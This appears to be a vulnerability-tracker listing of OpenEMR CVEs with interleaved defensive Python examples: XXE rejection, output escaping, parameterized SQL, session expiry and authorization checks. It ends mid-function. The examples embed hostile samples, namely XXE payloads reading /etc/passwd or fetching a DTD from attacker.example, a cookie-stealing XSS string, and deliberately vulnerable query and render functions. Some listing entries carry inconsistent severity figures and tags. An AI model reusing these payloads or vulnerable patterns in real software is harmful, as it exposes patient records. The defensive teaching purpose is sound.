CVSS 3.1
6.4
EPSS
0.7%
CVE-2025-29772 HIGH POC PATCH This Week

OpenEMR is a free and open source electronic health records and medical practice management application. Rated high severity (CVSS 7.2), this vulnerability is remotely exploitable. Public exploit code available.

PHP XSS Openemr
NVD GitHub
CVSS 4.0
7.2
EPSS
0.7%
CVE-2025-29789 MEDIUM POC PATCH This Month

OpenEMR is a free and open source electronic health records and medical practice management application. Rated medium severity (CVSS 4.6), this vulnerability is remotely exploitable with low attack complexity. Public exploit code is available.

Path Traversal Openemr
NVD GitHub
CVSS 4.0
4.6
EPSS
0.2%
EPSS 0% CVSS 7.6
HIGH This Week

A stored cross-site scripting (XSS) vulnerability exists in OpenEMR's CCDA document preview functionality that allows authenticated attackers to execute arbitrary JavaScript in clinician browser sessions. OpenEMR versions prior to 8.0.0.3 are affected. The vulnerability occurs because the XSL stylesheet fails to sanitize linkHtml attributes in CCDA documents, allowing javascript: URLs and event handlers to execute when documents are previewed.

XSS Openemr
NVD GitHub VulDB
EPSS 0% CVSS 7.7
HIGH This Week

Low-privilege authenticated users in OpenEMR versions up to and including 8.0.0.3 can view and download Ensora eRx error logs due to missing authorization checks, exposing sensitive healthcare system information. This broken access control vulnerability (CVSS 7.7) affects network-accessible installations; EPSS is 0.03% (8th percentile), with no public exploit identified at time of analysis. No vendor-released patch was identified at time of analysis according to the CVE disclosure.

Information Disclosure Openemr
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM This Month

OpenEMR portal payment pages prior to version 8.0.0.3 expose other patients' protected health information (PHI) and payment card metadata through an Insecure Direct Object Reference vulnerability. Authenticated portal patients can manipulate the `recid` query parameter in `portal/portal_payment.php` to access arbitrary patient payment records and billing data without authorization. The vulnerability affects all versions before 8.0.0.3 and carries a CVSS score of 6.5 (high confidentiality impact); however, the 0.03% EPSS score indicates low real-world exploitation probability, and no public exploit code or active exploitation has been identified.

Openemr PHP Information Disclosure
NVD GitHub VulDB
EPSS 0% CVSS 7.6
HIGH This Week

Improper access control in OpenEMR versions prior to 8.0.0.3 allows any authenticated user to download and permanently delete electronic claim batch files containing protected health information (PHI) via the billing file-download endpoint, regardless of whether they have billing privileges. The vulnerability has a 7.6 CVSS score with low attack complexity and requires only low-level authentication. EPSS exploitation probability is 0.03% (8th percentile), indicating low observed targeting in real-world exploitation at time of analysis, and no public exploit has been identified.

Openemr PHP Privilege Escalation +1
NVD GitHub VulDB
EPSS 0% CVSS 8.8
HIGH This Week

SQL injection in OpenEMR versions prior to 8.0.0.3 enables authenticated attackers to execute arbitrary SQL commands through the CAMOS form's ajax_save functionality, potentially leading to complete database compromise including extraction of sensitive health records, data modification, and service disruption. The vulnerability requires low-privilege authentication (PR:L) with no user interaction (UI:N) and is network-exploitable (AV:N), though EPSS assigns only 0.03% (8th percentile) exploitation probability and no public exploit identified at time of analysis. Vendor-released patch available in version 8.0.0.3.

Openemr SQLi PHP
NVD GitHub VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

OpenEMR versions prior to 8.0.0.3 allow authenticated API users to bypass administrative access controls on five insurance company management REST API endpoints due to missing authorization checks. An attacker with valid API credentials but non-administrative OpenEMR privileges can create, read, and modify insurance company records without proper permission validation. The vulnerability requires prior authentication and affects data integrity rather than confidentiality or availability; no public exploit code has been identified, and exploitation probability is very low (EPSS 0.02%).

Openemr Privilege Escalation Authentication Bypass
NVD GitHub VulDB
EPSS 0% CVSS 7.2
HIGH This Week

A blind SQL injection vulnerability exists in the PostCalendar module of OpenEMR, a widely-used open source electronic health records system. Versions prior to 8.0.0.3 are affected, allowing authenticated administrators to execute arbitrary SQL commands through the categoriesUpdate function's dels parameter. The vulnerability requires high privileges (PR:H) but is network-accessible and has no attack complexity, enabling attackers to extract sensitive patient data, modify health records, or disrupt medical operations.

SQLi Openemr
NVD GitHub VulDB
EPSS 0% CVSS 7.7
HIGH This Week

OpenEMR versions prior to 8.0.0.3 contain an XML External Entity (XXE) injection vulnerability in the Carecoordination module that allows authenticated users to read arbitrary files from the server. Attackers can exploit this by uploading a maliciously crafted CCDA document containing XXE payloads to access sensitive server files such as /etc/passwd. A patch is available in version 8.0.0.3, and this vulnerability has a CVSS score of 7.7 with high confidentiality impact.

XXE Openemr
NVD GitHub
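The XXE entry above turns on one fact: every external-entity, parameter-entity or entity-expansion payload has to be declared in a DTD, so an upload handler that refuses any DOCTYPE refuses the whole class. The following is an added example, not OpenEMR's code or its fix (OpenEMR's Carecoordination module is PHP; this is a Python reimplementation of the same check). The CCDA samples are constructed, and the HL7 namespace `urn:hl7-org:v3` is the only thing taken from the real format.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class UnsafeDocument(ValueError):
    """Raised for any upload that carries a DTD."""


def reject_doctype(data):
    """First pass with expat alone: stop the moment a DOCTYPE starts. External entities,
    parameter entities and expansion bombs all have to be declared in the DTD, so refusing
    the DTD refuses every one of them. Letting expat decode the bytes means a UTF-16 or
    otherwise re-encoded upload cannot slip past, which a regex on raw bytes could allow."""
    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeDocument(f"DOCTYPE {name!r} is not allowed in an uploaded clinical document")

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(data, True)


def load_ccda_title(data):
    """Validate first, then parse for real. Returns the document title, or None if absent."""
    reject_doctype(data)
    root = ET.fromstring(data)
    ns = {"hl7": "urn:hl7-org:v3"}
    title = root.find("hl7:title", ns)
    return title.text if title is not None else None


# Constructed samples: a minimal benign CCDA header, the classic internal-subset XXE
# aimed at /etc/passwd, and an external-DTD variant that would fetch its entity
# definitions from an attacker-controlled host (hypothetical hostname).
BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<ClinicalDocument xmlns="urn:hl7-org:v3">
  <title>Continuity of Care Document</title>
</ClinicalDocument>"""

XXE_INTERNAL = b"""<?xml version="1.0"?>
<!DOCTYPE ClinicalDocument [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<ClinicalDocument xmlns="urn:hl7-org:v3">
  <title>&xxe;</title>
</ClinicalDocument>"""

XXE_EXTERNAL_DTD = b"""<?xml version="1.0"?>
<!DOCTYPE ClinicalDocument SYSTEM "http://attacker.example/evil.dtd">
<ClinicalDocument xmlns="urn:hl7-org:v3"><title>x</title></ClinicalDocument>"""
```

Standard CCDA exports do not carry a DOCTYPE, so the check costs nothing for legitimate uploads (that is an assumption about the exporters you accept from; verify against your own samples). In the PHP/libxml world OpenEMR lives in, the equivalent rule is never to pass `LIBXML_NOENT` when loading untrusted XML and to add `LIBXML_NONET`; libxml2 2.9 and later already refuses to load external entities by default, but an explicit DOCTYPE rejection is the belt to that suspender.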
EPSS 0% CVSS 5.4
MEDIUM This Month

OpenEMR versions prior to 8.0.0.3 contain a stored cross-site scripting (XSS) vulnerability in form handling that allows authenticated attackers to inject malicious JavaScript into forms, which executes in the browser sessions of victims who submit those forms. An attacker with valid OpenEMR credentials can craft a malicious form that, upon submission by any user, executes arbitrary JavaScript with the privileges of the victim's session, potentially leading to session hijacking, credential theft, or unauthorized actions within the electronic health records system. The vulnerability is low-to-moderate severity (CVSS 5.4) due to the requirement for authentication and user interaction, but it poses significant risk in healthcare environments where attackers may have legitimate credentials and victims include healthcare providers with broad system access.

XSS Openemr
NVD GitHub
EPSS 0% CVSS 5.4
MEDIUM This Month

This is a stored/reflected cross-site scripting (XSS) vulnerability in OpenEMR versions prior to 8.0.0.3 where the POST parameter 'title' is echoed, improperly encoded, into a JSON response that is served with a text/html Content-Type header, so browsers render the injected markup as HTML and execute the JavaScript instead of treating the body as data. An authenticated attacker can craft a malicious request to execute arbitrary JavaScript in a victim's session, potentially leading to session hijacking, credential theft, or unauthorized actions within the electronic health records system. The vulnerability carries a moderate CVSS score of 5.4; it requires authentication and user interaction (UI:R), which reduces immediate exploitation likelihood. A fix commit is available in the GitHub repository.

XSS Openemr
NVD GitHub
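Two entries on this page are the same mistake from different angles: the `xl()` entry (strings handed to callers unescaped, then dropped into HTML or script) and the entry just above (JSON that is valid as data but served as text/html). Both are fixed by encoding for the context the bytes will land in, and by making the JSON inert regardless of how it is labelled. This added example is not OpenEMR's PHP or its `xl()` implementation; it is a Python sketch of the same contract, with a constructed translation table that contains one poisoned row and hypothetical function names.

```python
import html
import json

# Constructed translation table with one poisoned row, standing in for the
# database-backed lookup in the text; not OpenEMR's real table or xl() code.
TRANSLATIONS = {
    "Patient": "Patient",
    "Welcome": '<img src=x onerror="alert(document.cookie)">',
}


def xl_raw(key):
    """The unsafe contract: callers receive raw text and must remember to escape it."""
    return TRANSLATIONS.get(key, key)


def xl_html(key):
    """For HTML text nodes and double-quoted attribute values."""
    return html.escape(xl_raw(key), quote=True)


def escape_markup_in_json(encoded):
    """Hex-escape the characters that could close a <script> element or start a tag.
    The result is still a valid JSON document and a valid JavaScript string literal."""
    return encoded.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


def xl_js(key):
    """For a string literal inside a <script> block. json.dumps with the default
    ensure_ascii=True also escapes U+2028/U+2029, which would otherwise end a JS line."""
    return escape_markup_in_json(json.dumps(xl_raw(key)))


def render_heading_vulnerable(key):
    return f"<h1>{xl_raw(key)}</h1>"


def render_heading_hardened(key):
    return f"<h1>{xl_html(key)}</h1>"


def json_response_vulnerable(payload):
    """JSON body labelled text/html: a browser opening the URL renders the markup."""
    return {"Content-Type": "text/html; charset=utf-8"}, json.dumps(payload, ensure_ascii=False)


def json_response_hardened(payload):
    """Correct media type, sniffing disabled, and angle brackets escaped so the body stays
    inert even if some layer in front re-labels it as HTML."""
    headers = {
        "Content-Type": "application/json; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    return headers, escape_markup_in_json(json.dumps(payload))


def browser_would_render_markup(headers, body):
    """Crude model of the failure mode: an HTML media type plus a tag in the body."""
    ctype = headers.get("Content-Type", "").lower()
    return ctype.startswith("text/html") and "<" in body


def parse_json(body):
    """Round-trip check: the escaping changes nothing the API consumer sees."""
    return json.loads(body)
```

The useful property of `escape_markup_in_json` is that consumers are unaffected: `\u003c` decodes back to `<`, so the same escaped body is safe whether a JavaScript client parses it or a mislabelled response ends up in a document context.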
EPSS 0% CVSS 7.2
HIGH This Week

OpenEMR versions up to and including 8.0.0.2 contain a SQL injection vulnerability in the patient selection feature that allows authenticated attackers with high privileges to execute arbitrary SQL commands. The vulnerability stems from insufficient input validation and can lead to complete compromise of confidentiality, integrity, and availability of the healthcare database. No evidence of active exploitation (not in CISA KEV) or public proof-of-concept is currently available.

SQLi Openemr
NVD GitHub
EPSS 0% CVSS 5.9
MEDIUM This Month

OpenEMR versions prior to 8.0.0.3 contain a SQL injection vulnerability in the MedEx recall/reminder processing code where user-controlled variables are concatenated directly into SQL queries without parameterization or type casting. An authenticated attacker with high privileges can exploit this to extract, modify, or delete sensitive healthcare data from the database. While the CVSS score of 5.9 is moderate, the attack requires high privilege level (PR:H) and high complexity (AC:H), but the confidentiality and integrity impacts are severe given the medical context.

SQLi Openemr
NVD GitHub
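The PostCalendar entry (a `dels` list concatenated into a query) and the MedEx entry above (variables concatenated "without parameterization or type casting") describe the same defect; the list case is the one people get wrong even when they know about placeholders, because `IN (...)` needs one placeholder per element. This added example reproduces the concatenation pattern and its fix against an in-memory SQLite table; it is not OpenEMR's code, and the table name, columns and rows are constructed stand-ins, not OpenEMR's schema. The blind-injection probe in the test shows how an attacker who never sees query output still learns something from which rows disappear.

```python
import re
import sqlite3

# Constructed table and rows standing in for a category list; the schema is an
# assumption for the example, not OpenEMR's real one.
SAMPLE_ROWS = [(1, "Office visit"), (2, "Lab draw"), (3, "Telehealth")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pc_categories (pc_catid INTEGER PRIMARY KEY, pc_catname TEXT)")
    conn.executemany("INSERT INTO pc_categories VALUES (?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def remaining_ids(conn):
    return [row[0] for row in conn.execute(
        "SELECT pc_catid FROM pc_categories ORDER BY pc_catid")]


def delete_categories_vulnerable(conn, dels):
    """The concatenation pattern: the request string is spliced into the IN (...) list,
    so anything after a closing parenthesis becomes part of the WHERE clause."""
    conn.execute(f"DELETE FROM pc_categories WHERE pc_catid IN ({dels})")
    conn.commit()
    return remaining_ids(conn)


def parse_id_list(dels):
    """Type-cast every element before it goes anywhere near SQL; reject everything else.
    An empty element (trailing comma) is rejected too, so IN () can never be emitted."""
    ids = []
    for part in dels.split(","):
        part = part.strip()
        if not re.fullmatch(r"[0-9]{1,10}", part):
            raise ValueError(f"rejected non-numeric id: {part!r}")
        ids.append(int(part))
    return ids


def delete_categories_hardened(conn, dels):
    """Same operation with the list validated and bound as parameters, one placeholder per id."""
    ids = parse_id_list(dels)
    placeholders = ",".join("?" for _ in ids)
    conn.execute(f"DELETE FROM pc_categories WHERE pc_catid IN ({placeholders})", ids)
    conn.commit()
    return remaining_ids(conn)
```

The placeholder string is still built with string formatting, but only from a fixed character; the attacker-controlled values travel through the driver's parameter binding and are never parsed as SQL. Casting to `int` first is what the MedEx entry means by type casting, and it doubles as the validation step that produces a clean 400 instead of a database error.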
EPSS 0% CVSS 8.7
HIGH This Week

A stored cross-site scripting (XSS) vulnerability exists in OpenEMR's Eye Exam form functionality that allows authenticated users with the 'Notes - my encounters' role to inject malicious JavaScript payloads through form answers. OpenEMR versions prior to 8.0.0.3 are affected. Attackers can execute arbitrary JavaScript in the browsers of other authenticated users when they view the compromised encounter pages or visit history, potentially leading to session hijacking, credential theft, or unauthorized actions within the EHR system.

XSS Openemr
NVD GitHub
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

A remote code execution vulnerability in OpenEMR (CVSS 5.4) that allows any authenticated OpenEMR user. Remediation should follow standard vulnerability management procedures.

Authentication Bypass Openemr
NVD GitHub VulDB
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

An authorization bypass vulnerability in OpenEMR versions prior to 8.0.0.2 allows authenticated non-administrator users to access reminder messages and associated patient information belonging to other users by manipulating GET request parameters. Any authenticated user can view sensitive data including patient names and message content from arbitrary user accounts without proper authorization checks. This vulnerability has a CVSS score of 6.5 (Medium) with high confidentiality impact but no integrity or availability impact, and a proof-of-concept has been published via the GitHub security advisory.

Authentication Bypass Openemr
NVD GitHub VulDB
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Stored XSS in OpenEMR versions before 8.0.0.2 allows authenticated patient portal users to inject malicious scripts into their login username, which execute in the browsers of clinic staff when viewing the portal credential creation page. This vulnerability enables attackers to compromise staff and admin sessions through the patient context, potentially leading to unauthorized access or data manipulation within the healthcare system. A patch is available in version 8.0.0.2 and later.

XSS Openemr
NVD GitHub VulDB
EPSS 0% CVSS 8.1
HIGH PATCH This Week

A remote code execution vulnerability in OpenEMR (CVSS 8.1). High severity vulnerability requiring prompt remediation.

Authentication Bypass Openemr
NVD GitHub VulDB
EPSS 0% CVSS 7.6
HIGH PATCH This Week

OpenEMR versions prior to 8.0.0.2 allow authenticated users with the Notes role to trigger an out-of-band Server-Side Request Forgery (SSRF) vulnerability through unescaped HTML parsing in Eye Exam form PDF generation, enabling attackers to forge requests to arbitrary internal or external resources from the affected server. This vulnerability requires valid user credentials but no user interaction, and can lead to information disclosure or further internal network compromise. Versions 8.0.0.2 and later are outside the affected range.

SSRF Openemr
NVD GitHub VulDB
EPSS 0% CVSS 8.1
HIGH PATCH This Week

A remote code execution vulnerability in OpenEMR (CVSS 8.1). High severity vulnerability requiring prompt remediation.

Information Disclosure Openemr
NVD GitHub VulDB
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Stored XSS in OpenEMR prior to 8.0.0.2 allows authenticated users with the "Notes - my encounters" role to inject malicious JavaScript into Eye Exam form fields, which executes when other users with the same role view the form responses. An attacker can exploit this to steal session tokens, perform unauthorized actions, or compromise patient data through form manipulation. Versions 8.0.0.2 and later are outside the affected range.

XSS Openemr
NVD GitHub VulDB
EPSS 0% CVSS 4.4
MEDIUM PATCH This Month

DOM-based stored XSS in OpenEMR's SearchHighlight plugin (versions prior to 8.0.0.2) enables authenticated users with encounter form write access to inject malicious JavaScript that executes in other clinicians' browsers during report searches. An attacker can leverage this to steal session tokens, modify patient data, or perform actions on behalf of targeted medical staff. The vulnerability stems from improper handling of HTML entity decoding when parsing search results.

XSS Openemr
NVD GitHub VulDB
EPSS 0% CVSS 9.1
CRITICAL PATCH Act Now

Command injection in OpenEMR's backup functionality (versions prior to 8.0.0.2) allows authenticated high-privilege users to execute arbitrary commands on the underlying system due to insufficient input validation. The CVSS 9.1 critical rating reflects the potential for complete system compromise, though exploitation requires valid administrative credentials. Versions 8.0.0.2 and later are outside the affected range.

Command Injection Openemr
NVD GitHub VulDB
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

OpenEMR versions prior to 8.0.0.2 contain an authorization bypass vulnerability in the encounter vitals API that allows authenticated users with encounters/notes permissions to overwrite any patient's vital signs by supplying another patient's vital ID in the request body. This constitutes medical record tampering with integrity implications rated CVSS 6.5. No evidence of active exploitation in KEV or public POC availability was identified in the provided intelligence, though the vulnerability is straightforward to exploit given valid API credentials.

Authentication Bypass Openemr
NVD GitHub VulDB
EPSS 0% CVSS 6.5
MEDIUM This Month

OpenEMR versions up to 8.0.0 contain an authorization bypass vulnerability in the message/note update endpoints that allows authenticated users with notes permissions to modify any patient's messages without proper access control verification. An attacker can exploit this by supplying arbitrary message IDs in PUT or POST requests, enabling unauthorized modification of other patients' medical records. This is a moderate-risk issue (CVSS 6.5) with integrity impact on sensitive healthcare data, though exploitation requires existing authentication and notes permissions.

Authentication Bypass Openemr
NVD GitHub VulDB
EPSS 0% CVSS 8.8
HIGH This Week

OpenEMR versions prior to 8.0.0.1 contain a SQL injection vulnerability in the ajax graphs library that allows authenticated users to execute arbitrary database queries, potentially leading to complete compromise of patient health records and system data. The vulnerability stems from insufficient input validation and requires valid credentials to exploit, but poses a critical risk given the sensitive nature of healthcare data stored in OpenEMR systems. Versions 8.0.0.1 and later are outside the affected range.

SQLi Openemr
NVD GitHub VulDB
EPSS 0% CVSS 7.1
HIGH This Week

OpenEMR versions prior to 8.0.0.1 contain an inverted boolean condition in the access control logic that allows any authenticated user to access administrative CDR controllers (alerts, ajax, edit, add, detail, browse) intended for administrators only. Affected users can suppress clinical decision support alerts, delete or modify clinical plans, and edit rule configurations without proper authorization. Versions 8.0.0.1 and later are outside the affected range of this high-severity vulnerability.

Authentication Bypass Openemr
NVD GitHub VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored cross-site scripting in OpenEMR versions prior to 8.0.0.1 allows authenticated users with Track Anything feature access to inject malicious scripts into item names that execute in the browsers of all users viewing the corresponding Dygraph charts. An attacker with create or edit permissions can craft payloads that run in victims' sessions without their knowledge, potentially enabling session hijacking or unauthorized actions within the application. Versions 8.0.0.1 and later are outside the affected range.

XSS Openemr
NVD GitHub VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored cross-site scripting (XSS) in OpenEMR prior to 8.0.0.1 allows administrators or users with code management privileges to inject malicious scripts into code descriptions that execute in the browsers of all users accessing the dynamic code picker. All OpenEMR instances running affected versions are at risk, as any authenticated admin can inject payloads affecting the entire user base. Versions 8.0.0.1 and later are outside the affected range.

XSS Openemr
NVD GitHub VulDB
EPSS 0% CVSS 7.7
HIGH This Week

OpenEMR versions prior to 8.0.0.1 fail to properly enforce access controls on group encounters because the sensitivity check queries the wrong database table, allowing authenticated users to view restricted medical records such as mental health encounters they should not access. The vulnerability affects multi-user deployments where role-based restrictions are relied upon to protect sensitive patient information. Versions 8.0.0.1 and later are outside the affected range.

Authentication Bypass Openemr
NVD GitHub VulDB
EPSS 0% CVSS 4.3
MEDIUM This Month

OpenEMR versions prior to 8.0.0.1 fail to properly enforce access controls on the Claim File Tracker AJAX endpoint, allowing authenticated users without billing permissions to retrieve sensitive claim metadata including claim IDs, payer information, and transmission logs. An authenticated attacker with minimal privileges can access confidential billing information that should be restricted to authorized billing staff. Versions 8.0.0.1 and later are outside the affected range.

Authentication Bypass Openemr
NVD GitHub VulDB
EPSS 0% CVSS 7.7
HIGH This Week

Stored DOM-based cross-site scripting (XSS) in OpenEMR prior to version 8.0.0.1 allows authenticated attackers with low privileges to inject malicious scripts through unsanitized patient names in the portal signing component, which are rendered client-side via jQuery. Successful exploitation requires user interaction and could enable attackers to perform actions in the context of affected users or steal sensitive health information. A patch is available in OpenEMR 8.0.0.1 and later versions.

PHP XSS Openemr
NVD GitHub VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in OpenEMR's Pain Map form prior to version 8.0.0.1 allows authenticated users to inject malicious JavaScript into encounter records that executes when other clinicians view the affected form. Since session cookies lack HttpOnly protection, attackers can hijack sessions of other users including administrators. This vulnerability requires user interaction and network access but poses significant risk in multi-user healthcare environments.

XSS Openemr
NVD GitHub VulDB
EPSS 0% CVSS 9.6
CRITICAL POC PATCH Act Now

Information disclosure in OpenEMR from 5.0.2 up to, but not including, 8.0.0 exposes sensitive data. PoC and patch available.

Information Disclosure Openemr
NVD GitHub
EPSS 0% CVSS 10.0
CRITICAL POC PATCH Act Now

Unauthenticated token disclosure in OpenEMR before 8.0.0. CVSS 10.0. PoC and patch available.

Authentication Bypass Information Disclosure PHP +1
NVD GitHub
EPSS 0% CVSS 9.9
CRITICAL POC Act Now

Path traversal in OpenEMR 7.0.4 disposeDocument() allows file access. PoC available.

PHP RCE Openemr
NVD GitHub
EPSS 0% CVSS 7.1
HIGH POC PATCH This Week

OpenEMR versions prior to 8.0.0 allow authenticated portal users to access other patients' protected health information through insecure direct object references (IDOR) in the payment portal, enabling horizontal privilege escalation to view and modify another patient's demographics, invoices, and payment history. The vulnerability stems from accepting patient ID values from user-controlled request parameters instead of validating against the authenticated user's session. Public exploit code exists for this vulnerability.

PHP Privilege Escalation Openemr
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM POC PATCH This Month

OpenEMR versions up to 8.0.0 contain a path traversal vulnerability in the fax sending functionality that allows authenticated users to exfiltrate arbitrary files from the server, including database credentials, patient records, and source code. The fax endpoint fails to validate or restrict file paths, enabling attackers to read and transmit sensitive data to attacker-controlled phone numbers. Public exploit code exists for this vulnerability, and a patch is available.

Path Traversal Openemr
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM POC PATCH This Month

Authenticated users in OpenEMR through version 8.0.0 can access and modify eye exam records belonging to other patients by manipulating form IDs, bypassing patient context validation. This allows disclosure or alteration of sensitive medical data across the patient database, and public exploit code exists for this vulnerability. A patch is available on the main branch of the OpenEMR repository.

Github Openemr
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM POC PATCH This Month

OpenEMR versions up to 8.0.0 are affected by authorization bypass through a user-controlled key (CVSS 6.5).

Authentication Bypass Openemr
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM POC PATCH This Month

OpenEMR versions up to 8.0.0 are affected by authorization bypass through a user-controlled key (CVSS 6.5).

Authentication Bypass Openemr
NVD GitHub
EPSS 0% CVSS 7.1
HIGH POC This Week

OpenEMR versions up to 8.0.0 are affected by authorization bypass through a user-controlled key (CVSS 7.1).

Authentication Bypass Openemr
NVD GitHub
EPSS 0% CVSS 8.8
HIGH POC PATCH This Week

SQL injection in OpenEMR versions before 8.0.0 allows authenticated users to execute arbitrary database queries through the prescription listing feature due to improper input validation. An attacker with valid credentials could exploit this to read, modify, or delete sensitive medical records and patient data. Public exploit code exists for this vulnerability; administrators should upgrade to version 8.0.0 immediately.

SQLi Openemr
NVD GitHub
EPSS 0% CVSS 4.8
MEDIUM POC PATCH This Month

Stored XSS in OpenEMR prior to version 8.0.0 allows authenticated users with "Forms administration" role to inject malicious JavaScript into patient encounter forms, which executes when other users with the same role view the affected data. Public exploit code exists for this vulnerability. The issue is resolved in version 8.0.0.

XSS Openemr
NVD GitHub
EPSS 0% CVSS 7.5
HIGH POC PATCH This Week

OpenEMR prior to version 8.0.0 fails to enforce session expiration when the skip_timeout_reset parameter is present in requests, allowing expired sessions to remain active indefinitely. An attacker with a stolen session cookie can exploit this by continuously sending the skip_timeout_reset parameter to maintain unauthorized access to sensitive health records without being logged out. Public exploit code exists for this vulnerability with a CVSS score of 7.5.

PHP Openemr
NVD GitHub
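The skip_timeout_reset entry above is worth seeing in code, because the parameter has a legitimate purpose (background polling should not count as user activity) and the bug is in letting that purpose short-circuit the expiry check itself. This added example is not OpenEMR's session code (which is PHP); it is a Python model of the two behaviours with assumed timeout values and a replay of an attacker who polls with a stolen cookie. The hardened version also adds an absolute lifetime, which the advisory does not mention but which is what bounds a stolen cookie that is kept alive with ordinary requests.

```python
from dataclasses import dataclass

IDLE_TIMEOUT = 30 * 60          # seconds without activity before the session dies (assumed value)
ABSOLUTE_LIFETIME = 12 * 3600   # hard cap from login, whatever the activity (assumed value)


@dataclass
class Session:
    user: str
    created: float        # epoch seconds at login
    last_activity: float  # epoch seconds of the last request that counted as activity


def authorize_vulnerable(session, params, now):
    """The pattern in the advisory: a keepalive-style parameter short-circuits the whole
    timeout check instead of merely declining to refresh the activity timestamp."""
    if "skip_timeout_reset" in params:
        return True                                    # bug: no expiry check at all
    if now - session.last_activity > IDLE_TIMEOUT:
        return False
    session.last_activity = now
    return True


def authorize_hardened(session, params, now):
    """Expiry is evaluated on every request; the parameter only decides whether this
    request counts as user activity. The absolute lifetime bounds a stolen cookie even
    when the attacker keeps it 'active' with ordinary requests."""
    if now - session.created > ABSOLUTE_LIFETIME:
        return False
    if now - session.last_activity > IDLE_TIMEOUT:
        return False
    if "skip_timeout_reset" not in params:
        session.last_activity = now
    return True


def simulate_polling(authorize, use_skip_param, hours=24, interval_s=60):
    """Replay an attacker who stole a cookie at t=0 (the victim's last real request) and
    then polls every interval_s seconds for `hours`, with or without the parameter.
    Returns how many of the polls were accepted."""
    session = Session(user="victim", created=0.0, last_activity=0.0)
    params = {"skip_timeout_reset": "1"} if use_skip_param else {}
    accepted = 0
    for t in range(interval_s, hours * 3600 + 1, interval_s):
        if authorize(session, params, float(t)):
            accepted += 1
    return accepted
```

With the assumed values the vulnerable check accepts all 1440 polls over a day whether or not the parameter is present; the hardened check accepts 30 polls with the parameter (the 30 minutes of idle timeout, after which the session is dead because the polls never counted as activity) and 720 without it (the 12-hour absolute cap). In a real deployment the refusal path should also destroy the server-side session so a later request cannot revive it. For detection, a client that keeps sending skip_timeout_reset for longer than the configured idle timeout with no interactive requests in between is exactly the traffic this exploit produces.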
EPSS 0% CVSS 6.5
MEDIUM POC PATCH This Month

OpenEMR versions prior to 8.0.0 allow any authenticated user to view all internal messages and notes from other users by exploiting insufficient authorization checks on the Message Center's `show_all` parameter. The vulnerability exists because the application does not verify administrator privileges before returning the complete message list, enabling unauthorized disclosure of sensitive medical communications. Public exploit code exists for this medium-severity information disclosure vulnerability.

PHP Openemr
NVD GitHub
EPSS 0% CVSS 8.1
HIGH POC PATCH This Week

OpenEMR versions prior to 8.0.0 fail to enforce API authorization checks on document and insurance endpoints, allowing any authenticated API client to read and modify all patient PHI regardless of assigned access controls. Public exploit code exists for this vulnerability, which affects healthcare organizations using OpenEMR's REST API. An attacker with valid API credentials can access sensitive medical records and insurance information across the entire patient database.

PHP Openemr
NVD GitHub
EPSS 0% CVSS 9.9
CRITICAL POC PATCH Act Now

SQL injection in OpenEMR before the fixed release allows authenticated users to execute arbitrary SQL through the medical records system. A public PoC and a patch are available.

SQLi Openemr
NVD GitHub
EPSS 0% CVSS 8.1
HIGH POC PATCH This Week

OpenEMR versions prior to 8.0.0 contain an authorization bypass in the patient portal that allows authenticated users to forge provider signatures by uploading files with admin-signature type parameters for any provider. Public exploit code exists for this vulnerability, which could enable signature forgery on medical documents, creating legal and compliance risks. Upgrade to version 8.0.0 or later to remediate this high-severity flaw.

Authentication Bypass Openemr
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM POC PATCH This Month

OpenEMR versions prior to 8.0.0 contain an authorization bypass in the FHIR CareTeam endpoint that allows authenticated users with patient-scoped tokens to retrieve care team information for all patients rather than only their own, potentially exposing Protected Health Information across the entire system. The vulnerability exists because the service fails to enforce patient compartment filtering, and public exploit code is available. Security professionals should prioritize patching to version 8.0.0 or later to prevent unauthorized PHI disclosure.

Information Disclosure Openemr
NVD GitHub
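The Message Center show_all entry, the document and insurance API entry, the provider-signature upload entry and the FHIR CareTeam entry above share one root cause: a privilege or a patient compartment that the UI implies but the server never enforces. The following is an added example written for this page (not OpenEMR's code) of the two hardened shapes: a patient-scoped token pinned to its own compartment regardless of the request's filter, and a privileged parameter checked on every request. Role names, the Principal class and the sample records are assumptions.

```python
from dataclasses import dataclass
from typing import Optional

@dataclass
class Principal:
    user_id: str
    role: str                                # assumed role names: admin, clinician, receptionist, patient
    patient_context: Optional[str] = None    # set when the OAuth2 token is patient-scoped

class Forbidden(Exception):
    pass

# Constructed sample records (not OpenEMR data).
CARE_TEAMS = [
    {"id": "ct-1", "patient": "p-100", "participants": ["dr-a"]},
    {"id": "ct-2", "patient": "p-200", "participants": ["dr-b"]},
]
MESSAGES = [
    {"id": 1, "owner": "u-alice", "body": "lab result"},
    {"id": 2, "owner": "u-bob", "body": "referral"},
]

def careteam_search_vulnerable(principal, patient_param=None):
    """Flawed: honours the caller's filter (or none) and never consults the token's compartment."""
    if patient_param is None:
        return list(CARE_TEAMS)
    return [ct for ct in CARE_TEAMS if ct["patient"] == patient_param]

def careteam_search_fixed(principal, patient_param=None):
    """Hardened: a patient-scoped token is pinned to its own compartment. A request for another
    patient is refused rather than silently narrowed, so the attempt shows up in audit logs."""
    if principal.patient_context is not None:
        if patient_param not in (None, principal.patient_context):
            raise Forbidden("patient compartment mismatch")
        patient_param = principal.patient_context
    if patient_param is None:
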